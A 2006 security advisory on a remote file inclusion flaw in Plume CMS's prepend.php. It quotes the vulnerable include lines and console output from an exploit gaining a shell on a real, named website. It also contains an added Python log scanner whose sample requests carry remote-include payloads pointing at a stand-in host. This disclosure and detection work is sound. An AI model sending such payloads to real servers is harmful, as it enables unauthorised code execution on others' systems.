Plume CMS Include File Error in 'prepend.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID: 1015624
SecurityTracker URL: http://securitytracker.com/id/1015624
CVE Reference:
GENERIC-MAP-NOMATCH
Date: Feb 14 2006
Impact:
Execution of arbitrary code via network, User access via network
Description:
unitedbr of Untruth Labs reported a vulnerability in Plume CMS. A remote user can execute arbitrary commands on the target system.
The 'prepend.php' script does not properly validate user-supplied input in the 'manager_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
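A detection sketch for the request pattern described above, added here as an example and not part of the original advisory or the reporter's code: it scans web access log lines for requests to 'prepend.php' that set '_PX_config[manager_path]' and separates URL or stream-wrapper values from other overrides. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Start of a Combined Log Format line: client, timestamp, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# Values include_once would treat as a URL or stream wrapper, not a local path.
WRAPPER = re.compile(r"^[a-z][a-z0-9+.\-]*://|^data:", re.I)
PARAM = "_PX_config[manager_path]"  # query-string form of $_PX_config['manager_path']

def decode_all(text, rounds=3):
    """Undo repeated percent-encoding (%255B -> %5B -> [) for a conservative match."""
    for _ in range(rounds):
        text, previous = unquote(text), text
        if text == previous:
            break
    return text

def classify(line):
    """Return (client, status, verdict) if the request sets manager_path, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    path, _, query = target.partition("?")
    if not decode_all(path).lower().endswith("/prepend.php"):
        return None
    for key, value in parse_qsl(query, keep_blank_values=True):
        if decode_all(key) == PARAM:
            remote = WRAPPER.match(decode_all(value))
            return client, int(status), "remote-include" if remote else "path-override"
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [14/Feb/2006:08:01:00 -0300] "GET /index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [14/Feb/2006:08:02:11 -0300] "GET /prepend.php?'
    '_PX_config[manager_path]=http://files.example.net/x? HTTP/1.0" 200 734',
    '198.51.100.7 - - [14/Feb/2006:08:02:15 -0300] "GET /cms/prepend.php?'
    '_PX_config%255Bmanager_path%255D=hTTp%3A%2F%2Ffiles.example.net%2Fx HTTP/1.0" 404 210',
    '203.0.113.5 - - [14/Feb/2006:09:30:02 -0300] "GET /prepend.php?'
    '_PX_config[manager_path]=/tmp HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE):
        print(f"{client} status={status} {verdict}")
```

Access logs record only the request line, so the same variable supplied in a POST body or cookie would not appear in this scan.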
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:
No solution was available at the time of this entry.
Vendor URL: www.plume-cms.net/
Cause:
Input validation error, State error
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
Message History:
None.
Source Message Contents
Date: Tue, 14 Feb 2006 07:59:56 -0300
Subject: Plume CMS bug and exploit
/*
____ ____ __
| | | | | | | /
| | | | | |___/ \
| | --- | |----| | \ \
|____| |____ | | |____| __/
Copyright (C) 2006 Untruth Labs
Plume CMS remote file inclusion
bug found by unitedbr
remote: yes
vendor: www.plume-cms.net
exploitation: the user can inject remote bad php code
file prepend.php, line 38 and 39:
include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';
Exploit working:
$ java plume1 www.airedebussac.org /
-===========================-
-= Untruth Labs presents =-
-= =-
-= PLUME CMS EXPLOIT =-
-= =-
-= by unitedbr =-
-===========================-
bash-2.05$ id
id
uid=55012(airedebu) gid=100(users) groups=99(nobody)
bash-2.05$ uname -a
uname -a
Linux web118.60gp.ha.ovh.net 2.4.31-mutu-hidden #1 SMP Tue Oct 11 11:51:39 CEST
2005 i686 unknown
bash-2.05$ pwd
pwd
/home.2/airedebu/www
bash-2.05$ exit
exit
$
*/
Content-Type: application/octet-stream; name="plume1.java"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="plume1.java"